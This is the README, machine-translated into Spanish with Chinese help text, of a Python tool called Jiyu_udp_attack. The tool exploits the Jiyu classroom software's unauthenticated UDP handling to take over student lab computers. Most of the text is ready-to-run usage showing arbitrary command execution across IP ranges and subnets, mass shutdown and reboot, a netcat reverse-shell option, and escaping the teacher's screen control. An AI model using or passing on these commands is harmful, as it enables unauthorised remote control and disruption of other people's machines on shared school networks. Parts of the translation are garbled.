Jiyu_udp_attack

• Debido a que la terminal de estudiantes de Jiyu no realiza (=・ω・=) autenticación en el paquete UDP recibido, podemos construir un paquete de datos específico para que lo ejecute la terminal de estudiantes, logrando así la ejecución de comandos y atacando a cualquier estudiante en línea en la sala de computadoras. máquina.

• Python3

v1.5

• Corregir error de ejecución de comandos

v1.4

• Reconstrucción de código, optimización de la lógica de selección de parámetros.
• La función de shell de rebote agrega un puerto aleatorio
• Actualizar documentación

v1.3

• Desactivar/restaurar el control de pantalla
• Soporte de rebote

v1.2

• arreglar error

v1.1

• La opción -g permite obtener el puerto en el que el estudiante está escuchando.

v1.0

• primera presentación

 usage:

    ------------------- Github Repositories -------------------
            https://github.com/ht0Ruial/Jiyu_udp_attack

       [-h] -ip IP [-p P] [-msg MSG] [-c C] [-l L] [-t T]
       [-e {r,s,g,nc,break,continue}]
       {r,s,g,nc,break,continue} ...

positional arguments:
  {r,s,g,nc,break,continue}
                        -e 参数的详细说明
    r                   reboot 重启
    s                   shutdown 关机
    g                   独立选项，获取当前的ip地址以及学生端监听的端口
    nc                  独立选项，反弹shell的机器需出网，退出可使用命令exit
    break               独立选项，脱离屏幕控制，需要管理员权限
    continue            独立选项，恢复屏幕控制

optional arguments:
  -h, --help            show this help message and exit
  -ip IP                ip 指定目标IP地址
  -p P                  port 指定监听端口，默认端口为4705
  -msg MSG              send_message发送消息 eg: -msg "HelloWord!"
  -c C                  command命令 eg: -c "cmd.exe /c ipconfig"
  -l L                  循环次数，默认为1
  -t T                  循环时间间隔，默认是22秒
  -e {r,s,g,nc,break,continue}
                        Extra Options加载额外的选项 eg：-e r
          

Cuando utilice el parámetro -ip para especificar la IP de destino, puede especificarla de las siguientes maneras:

• Especifique una única IP, como 192.168.80.12
• Especifique el rango de IP, como 192.168.80.10-56
• Especifique el segmento C donde se encuentra la IP, como 192.168.80.1/24

Si el puerto de escucha del lado del estudiante no es el 4705 predeterminado, debe usar el parámetro -p para especificar el puerto durante operaciones posteriores.

 python Jiyu_udp_attack.py -e g

Los permisos de ejecución actuales deben ser permisos de administrador, que se utilizan principalmente para iniciar el servicio MpsSvc.

 python Jiyu_udp_attack.py -e break

 python Jiyu_udp_attack.py -e continue

Si el puerto de escucha del lado del estudiante es 4705 , envíe un mensaje con el contenido "¡hola, bebé!" a la máquina con la dirección IP 192.168.80.12.

 python Jiyu_udp_attack.py -ip 192.168.80.12 -msg "hello,baby!"

Si el puerto de escucha del lado del estudiante es 4605 , debe usar el parámetro -p para especificar el puerto y enviar un mensaje con el contenido "¡hola, bebé!" a la máquina con la dirección IP 192.168.80.12.

 python Jiyu_udp_attack.py -ip 192.168.80.12 -p 4605 -msg "hello,baby!"

Juega una calculadora de 192.168.80.12 a 192.168.80.137

 python Jiyu_udp_attack.py -ip 192.168.80.12-137 -c calc.exe

Al recuperar el shell, la IP solo puede ser la IP de una determinada máquina y no se puede recuperar en lotes. Además, la máquina necesita salir de la red porque se ha implementado la ejecución por lotes de comandos arbitrarios. Teniendo en cuenta que el rebote por lotes no tiene sentido. , no se agrega.

 python Jiyu_udp_attack.py -ip 192.168.80.12 -e nc

Cerrar

 python Jiyu_udp_attack.py -ip 192.168.80.12 -e s

Reanudar

 python Jiyu_udp_attack.py -ip 192.168.80.12 -e r

Enviar mensajes continuamente usando un bucle
La máquina 1-254 recibirá un mensaje de "¡hola, bebé!" y continuará ejecutándose después de 50 segundos, un total de 3 veces.

    python Jiyu_udp_attack.py -ip 192.168.80.23/24 -msg "hello,baby!" -l 3 -t 50